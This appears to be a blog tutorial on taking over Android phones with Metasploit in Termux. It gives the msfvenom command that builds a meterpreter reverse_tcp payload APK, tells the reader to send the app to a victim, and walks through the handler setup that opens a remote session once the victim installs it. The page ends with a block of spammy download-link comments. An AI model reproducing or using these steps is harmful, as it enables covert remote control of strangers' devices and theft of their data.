༒Android Hacking In Termux Using
Metasploit-Cyber Ninja༒
Now Create Payload:
Command :
msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) LPORT=(Your Specific Port) R>appname.apk
=>Run This Command And Wait For 1 Minute Now Payload Was Created.
=>ls Command Run In Same dir Check Your APK File.
=>App Saved In $HOME/
=>Copy The App To Your Storage.
=>cp appname.apk /storage/emulated/0/
DCIM/ (for internal storage).
=>cp appname.apk /sdcard/ (for sdcard)
=>Now Send The Apk File To Victim
=>Now Open Metasploit Framework
Open New Session In Termux :
=> msfconsole (if not work give this
command
=>Now Metasploit Framework Opened:
Step1:
use exploit/multi/handler
Step2:
set payload
android/meterpreter/reverse_tcp
Step3:
set LHOST localhost
Step:4
set LPORT 4444
Step4:
exploit
=>Now Started Reverse tcp Handler : 4444
=>Now Server Waiting For Victim Interaction.
=> Victim Installed And Opened The App
=>Meterpreter Session 1 Opened.
(Successfully Hacked ).
Now Meterpreter Commands:
Type 'help' to Know All Commands Showing.
All The Best
By Cyber Ninja
꧁UNDER SCOPE꧂
-----------------------



1 comments:
Click here for comments~ Cyber Ninja >>>>> Download Now
>>>>> Download Full
~ Cyber Ninja >>>>> Download LINK
>>>>> Download Now
~ Cyber Ninja >>>>> Download Full
>>>>> Download LINK FK
ConversionConversion EmoticonEmoticon